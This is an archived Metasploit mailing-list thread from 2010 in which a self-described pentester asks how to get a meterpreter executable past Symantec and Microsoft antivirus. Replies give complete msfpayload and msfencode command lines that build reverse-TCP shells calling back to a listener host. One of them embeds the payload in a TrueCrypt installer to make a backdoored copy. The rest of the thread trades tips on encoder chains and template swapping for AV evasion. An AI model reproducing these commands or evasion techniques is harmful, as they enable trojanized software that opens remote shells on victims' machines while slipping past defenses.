Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Shikata_ga_nai evasion...

From: Terrence <secretpackets () gmail com>
Date: Sun, 14 Mar 2010 15:14:06 -0400
Are you using an online av checker? Or do you know the av your client is using?


On Sun, Mar 14, 2010 at 15:07, netevil <netevil () hackers it> wrote:



Check out the metasploit unleashed section on av bypass

./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130
LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 |
./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e
x86/countdown -t exe > /tmp/6.exe


Hi Terrence,
I've tried the command above but the results are getting worse...
now i have many(15) other AVs that sign my exe as suspicious..

David






On Sun, Mar 14, 2010 at 14:33, netevil <netevil () hackers it> wrote:

here it is Terrence!

sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.253.128.220
LPORT=53 R | sudo ./msfencode -t exe -x /home/john/pentest/TrueCrypt.exe
-o  /home/john/pentest/TrueCrypt_backdoored.exe -e x86/shikata_ga_nai -c 5



Send the command you are using to generate the payloads.




On Sun, Mar 14, 2010 at 14:24, ricky-lee birtles <mr.r.birtles () gmail com> wrote:

Try using some of the tools from
http://technet.microsoft.com/en-us/sysinternals/default.aspx as
templates.

As well as trying to use a different payload and see if that brings
any different results/.
Regards,
-- Mr R Birtles



On 14 March 2010 18:04, netevil <netevil () hackers it> wrote:

Confirmed!..also changing template (TrueCrypt.exe, Mame.exe...)
results don't change...

Davidd



Have you tried using a different .exe template. As the default one is
what most AV vendors are using to pick up the metasploit's outputted
exe's


Yes Ricky!
I've tried with an original putty... and this template is a flash movie
i'm going to do a the third test with another template.. and see if
results changes...hoping at least for symantec..

thanks
David



Regards,
-- Mr R Birtles



On 14 March 2010 17:40, NetEvil <netevil () hackers it> wrote:

Hi guys
I'm doing a pentest using my meterpreter exe encoded with shikata ga nai..
and i see it signed as suspicious by symantec and microsoft...
Do you have a quick solution for these AVs evasion? I've tried some packers
but same results...
If not ...i know the hex editor is waiting for me...

Thanks...have a nice sunday!
David


Sent from my mobile device
--------------------------------------
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework






_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: